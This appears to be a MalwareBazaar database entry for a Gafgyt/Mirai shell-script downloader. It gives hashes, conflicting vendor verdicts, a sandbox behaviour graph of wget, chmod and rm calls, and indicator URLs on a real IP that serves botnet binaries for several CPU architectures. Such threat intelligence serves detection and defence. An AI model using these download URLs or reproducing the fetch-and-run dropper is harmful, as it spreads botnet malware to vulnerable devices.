MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 84c3deee171c8ee76b04757d2ba862f4eb5152cebf0fb25dd2913d22c1fd0e4b. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


Gafgyt


Vendor detections: 7


Intelligence 7 IOCs YARA 1 File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: 84c3deee171c8ee76b04757d2ba862f4eb5152cebf0fb25dd2913d22c1fd0e4b
SHA3-384 hash: a868fdb057b1588f3be94cb8e2b63f0d9f77a5b00257d2acabe05e63c05a1477839293c77c0dc96d397b90aea66537b4
SHA1 hash: 4c4246b4aedd99cf280af5ab165bb81f1f013b0e
MD5 hash: 7be10eb8c4fb555c471043d7d71012f1
humanhash: beryllium-king-lima-charlie
File name:uni
Download: download sample
Signature Gafgyt
Create hunting rule
File size:640 bytes
First seen:2026-01-28 16:28:18 UTC
Last seen:Never
File type: sh
MIME type:text/plain
ssdeep 12:CLJoZDSLJhHWsLsySLshHWsLPBzvSLPBzMHWsLPnIjDSLPnIMHWsLPiDSLPDHWJ:CCZeTWsw5wRWs9z69zGWszJzhWsGeXWJ
TLSH T112F0E8EF00B14C6D1244FA0AF9E20E78A80A69DD58C50F4C5F8F3C39788D9187835FA8
Magika txt
Reporter abuse_ch
Tags:sh
URLMalware sample (SHA256 hash)SignatureTags
http://109.104.155.24/mipse21b7bea60a9530514cc047e69acc0a4f8fcd4aa0b0b740b44420536df8db05d Gafgyt32-bit elf gafgyt Mozi
http://109.104.155.24/mpsl10a7aff25c88eb3fb4ce17dbdd1d78e941b3c4696935f2843afae1a7403c73d3 Miraielf mirai ua-wget
http://109.104.155.24/arm4ac0de66ad392299c321c00db0b0f010ff5d63a18392364b8f07ea8da4f94c52f Miraielf mirai ua-wget
http://109.104.155.24/arm55a2f439cbeb1481de5ee95086d4119fbf28a8d8b89ae9a93ee9dd45472cf5f78 Miraielf mirai ua-wget
http://109.104.155.24/arm7fefec7b2d044fee96b0d7315c1a648a64c78fd6cbb1753c7d90e027676379e7e Miraielf mirai ua-wget

Intelligence

File Origin
# of uploads :
1
# of downloads :
61
Origin country :
DE DE
Vendor Threat Intelligence
No detections
Verdict:
Malicious
Threat level:
  10/10
Confidence:
100%
Tags:
base64 bash busybox evasive lolbin mirai
Link:
https://www.filescan.io/uploads/697a3a1d4156786ccbdd398a/reports/2e10aaa2-2462-4d60-8d21-360a87d5d4e7/overview
Verdict:
Malicious
Labled as:
TrojanDownloader/Linux.Agent
Link:
https://www.hybrid-analysis.com/sample/84c3deee171c8ee76b04757d2ba862f4eb5152cebf0fb25dd2913d22c1fd0e4b
Result
Gathering data
Status:
terminated
Link:
https://sandbox.kunai.rocks/analysis/4d516055-c850-40ff-b322-8d053983c357
Behavior Graph:
Download SVG
%3 guuid=081528ac-1700-0000-6d4c-98554b0c0000 pid=3147 /usr/bin/sudo guuid=c3a677ae-1700-0000-6d4c-9855510c0000 pid=3153 /tmp/sample.bin guuid=081528ac-1700-0000-6d4c-98554b0c0000 pid=3147->guuid=c3a677ae-1700-0000-6d4c-9855510c0000 pid=3153 execve guuid=469aefae-1700-0000-6d4c-9855520c0000 pid=3154 /usr/bin/dash guuid=c3a677ae-1700-0000-6d4c-9855510c0000 pid=3153->guuid=469aefae-1700-0000-6d4c-9855520c0000 pid=3154 clone guuid=509f044d-1800-0000-6d4c-9855060d0000 pid=3334 /usr/bin/chmod guuid=c3a677ae-1700-0000-6d4c-9855510c0000 pid=3153->guuid=509f044d-1800-0000-6d4c-9855060d0000 pid=3334 execve guuid=2a97614d-1800-0000-6d4c-9855070d0000 pid=3335 /usr/bin/dash guuid=c3a677ae-1700-0000-6d4c-9855510c0000 pid=3153->guuid=2a97614d-1800-0000-6d4c-9855070d0000 pid=3335 clone guuid=93f2d94f-1800-0000-6d4c-98550d0d0000 pid=3341 /usr/bin/rm delete-file guuid=c3a677ae-1700-0000-6d4c-9855510c0000 pid=3153->guuid=93f2d94f-1800-0000-6d4c-98550d0d0000 pid=3341 execve guuid=a78e5b50-1800-0000-6d4c-98550e0d0000 pid=3342 /usr/bin/dash guuid=c3a677ae-1700-0000-6d4c-9855510c0000 pid=3153->guuid=a78e5b50-1800-0000-6d4c-98550e0d0000 pid=3342 clone guuid=61ac498e-1800-0000-6d4c-98559e0d0000 pid=3486 /usr/bin/chmod guuid=c3a677ae-1700-0000-6d4c-9855510c0000 pid=3153->guuid=61ac498e-1800-0000-6d4c-98559e0d0000 pid=3486 execve guuid=88699f8e-1800-0000-6d4c-9855a00d0000 pid=3488 /usr/bin/dash guuid=c3a677ae-1700-0000-6d4c-9855510c0000 pid=3153->guuid=88699f8e-1800-0000-6d4c-9855a00d0000 pid=3488 clone guuid=8e56408f-1800-0000-6d4c-9855a40d0000 pid=3492 /usr/bin/rm delete-file guuid=c3a677ae-1700-0000-6d4c-9855510c0000 pid=3153->guuid=8e56408f-1800-0000-6d4c-9855a40d0000 pid=3492 execve guuid=d253898f-1800-0000-6d4c-9855a60d0000 pid=3494 /usr/bin/dash guuid=c3a677ae-1700-0000-6d4c-9855510c0000 pid=3153->guuid=d253898f-1800-0000-6d4c-9855a60d0000 pid=3494 clone guuid=9b51bdd2-1800-0000-6d4c-9855100e0000 pid=3600 /usr/bin/chmod guuid=c3a677ae-1700-0000-6d4c-9855510c0000 pid=3153->guuid=9b51bdd2-1800-0000-6d4c-9855100e0000 pid=3600 execve guuid=7178f7d2-1800-0000-6d4c-9855120e0000 pid=3602 /usr/bin/dash guuid=c3a677ae-1700-0000-6d4c-9855510c0000 pid=3153->guuid=7178f7d2-1800-0000-6d4c-9855120e0000 pid=3602 clone guuid=bc4080d3-1800-0000-6d4c-9855150e0000 pid=3605 /usr/bin/rm delete-file guuid=c3a677ae-1700-0000-6d4c-9855510c0000 pid=3153->guuid=bc4080d3-1800-0000-6d4c-9855150e0000 pid=3605 execve guuid=8d67d8d3-1800-0000-6d4c-9855160e0000 pid=3606 /usr/bin/dash guuid=c3a677ae-1700-0000-6d4c-9855510c0000 pid=3153->guuid=8d67d8d3-1800-0000-6d4c-9855160e0000 pid=3606 clone guuid=528ef021-1900-0000-6d4c-9855a30e0000 pid=3747 /usr/bin/chmod guuid=c3a677ae-1700-0000-6d4c-9855510c0000 pid=3153->guuid=528ef021-1900-0000-6d4c-9855a30e0000 pid=3747 execve guuid=eb186422-1900-0000-6d4c-9855a60e0000 pid=3750 /usr/bin/dash guuid=c3a677ae-1700-0000-6d4c-9855510c0000 pid=3153->guuid=eb186422-1900-0000-6d4c-9855a60e0000 pid=3750 clone guuid=13c62324-1900-0000-6d4c-9855ad0e0000 pid=3757 /usr/bin/rm delete-file guuid=c3a677ae-1700-0000-6d4c-9855510c0000 pid=3153->guuid=13c62324-1900-0000-6d4c-9855ad0e0000 pid=3757 execve guuid=ae2d8624-1900-0000-6d4c-9855b10e0000 pid=3761 /usr/bin/dash guuid=c3a677ae-1700-0000-6d4c-9855510c0000 pid=3153->guuid=ae2d8624-1900-0000-6d4c-9855b10e0000 pid=3761 clone guuid=e1b7fe63-1900-0000-6d4c-9855560f0000 pid=3926 /usr/bin/chmod guuid=c3a677ae-1700-0000-6d4c-9855510c0000 pid=3153->guuid=e1b7fe63-1900-0000-6d4c-9855560f0000 pid=3926 execve guuid=f322c064-1900-0000-6d4c-9855580f0000 pid=3928 /usr/bin/dash guuid=c3a677ae-1700-0000-6d4c-9855510c0000 pid=3153->guuid=f322c064-1900-0000-6d4c-9855580f0000 pid=3928 clone guuid=341f9b65-1900-0000-6d4c-98555b0f0000 pid=3931 /usr/bin/rm delete-file guuid=c3a677ae-1700-0000-6d4c-9855510c0000 pid=3153->guuid=341f9b65-1900-0000-6d4c-98555b0f0000 pid=3931 execve guuid=1a630aaf-1700-0000-6d4c-9855530c0000 pid=3155 /usr/bin/wget net send-data write-file guuid=469aefae-1700-0000-6d4c-9855520c0000 pid=3154->guuid=1a630aaf-1700-0000-6d4c-9855530c0000 pid=3155 execve 385d8803-1747-5868-8d2c-7f0b0905a0a5 109.104.155.24:80 guuid=1a630aaf-1700-0000-6d4c-9855530c0000 pid=3155->385d8803-1747-5868-8d2c-7f0b0905a0a5 send: 133B guuid=2e9d6f50-1800-0000-6d4c-98550f0d0000 pid=3343 /usr/bin/wget net send-data write-file guuid=a78e5b50-1800-0000-6d4c-98550e0d0000 pid=3342->guuid=2e9d6f50-1800-0000-6d4c-98550f0d0000 pid=3343 execve guuid=2e9d6f50-1800-0000-6d4c-98550f0d0000 pid=3343->385d8803-1747-5868-8d2c-7f0b0905a0a5 send: 133B guuid=ab4d968f-1800-0000-6d4c-9855a70d0000 pid=3495 /usr/bin/wget net send-data write-file guuid=d253898f-1800-0000-6d4c-9855a60d0000 pid=3494->guuid=ab4d968f-1800-0000-6d4c-9855a70d0000 pid=3495 execve guuid=ab4d968f-1800-0000-6d4c-9855a70d0000 pid=3495->385d8803-1747-5868-8d2c-7f0b0905a0a5 send: 133B guuid=177fe5d3-1800-0000-6d4c-9855170e0000 pid=3607 /usr/bin/wget net send-data write-file guuid=8d67d8d3-1800-0000-6d4c-9855160e0000 pid=3606->guuid=177fe5d3-1800-0000-6d4c-9855170e0000 pid=3607 execve guuid=177fe5d3-1800-0000-6d4c-9855170e0000 pid=3607->385d8803-1747-5868-8d2c-7f0b0905a0a5 send: 133B guuid=eb4a9b24-1900-0000-6d4c-9855b20e0000 pid=3762 /usr/bin/wget net send-data write-file guuid=ae2d8624-1900-0000-6d4c-9855b10e0000 pid=3761->guuid=eb4a9b24-1900-0000-6d4c-9855b20e0000 pid=3762 execve guuid=eb4a9b24-1900-0000-6d4c-9855b20e0000 pid=3762->385d8803-1747-5868-8d2c-7f0b0905a0a5 send: 133B
Score:
100%
Verdict:
Malware
File Type:
SCRIPT
Link:
https://malprob.io/report/84c3deee171c8ee76b04757d2ba862f4eb5152cebf0fb25dd2913d22c1fd0e4b
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/84c3deee171c8ee76b04757d2ba862f4eb5152cebf0fb25dd2913d22c1fd0e4b/
Verdict:
Malicious
Threat:
Trojan-Downloader.Shell.Agent
Link:
https://tip.neiki.dev/file/84c3deee171c8ee76b04757d2ba862f4eb5152cebf0fb25dd2913d22c1fd0e4b
Threat name:
Linux.Downloader.Generic
Create hunting rule
Status:
Suspicious
First seen:
2026-01-28 16:24:38 UTC
File Type:
Text (Shell)
AV detection:
10 of 36 (27.78%)
Threat level:
  3/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=qtb553qxdshoo2yeov6sxkdc6tvvcuwox4h3exosse6sfqp5bzfq._file
Result
Malware family:
n/a
Score:
  3/10
Tags:
n/a
Link:
https://tria.ge/reports/260128-t174safz3h/
Behaviour
Modifies registry class
Suspicious use of SetWindowsHookEx
Enumerates physical storage devices
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Legit
Score:
0.00
Link:
https://yomi.yoroi.company/submissions/84c3deee171c8ee76b04757d2ba862f4eb5152cebf0fb25dd2913d22c1fd0e4b

YARA Signatures

MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:ach_202412_suspect_bash_script
Create hunting rule
Author:abuse.ch
Description:Detects suspicious Linux bash scripts

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Web download

Gafgyt

sh 84c3deee171c8ee76b04757d2ba862f4eb5152cebf0fb25dd2913d22c1fd0e4b

(this sample)

Gafgyt

elf e21b7bea60a9530514cc047e69acc0a4f8fcd4aa0b0b740b44420536df8db05d

  
URLhaus
https://urlhaus.abuse.ch/url/3765129/
  
Delivery method
Distributed via web download
  
URLhaus
https://urlhaus.abuse.ch/url/3765149/
  
URLhaus
https://urlhaus.abuse.ch/url/3765158/
  
Dropping
MD5 8526b44220e0c103f843854638746dcc
  
Dropping
SHA256 e21b7bea60a9530514cc047e69acc0a4f8fcd4aa0b0b740b44420536df8db05d

Comments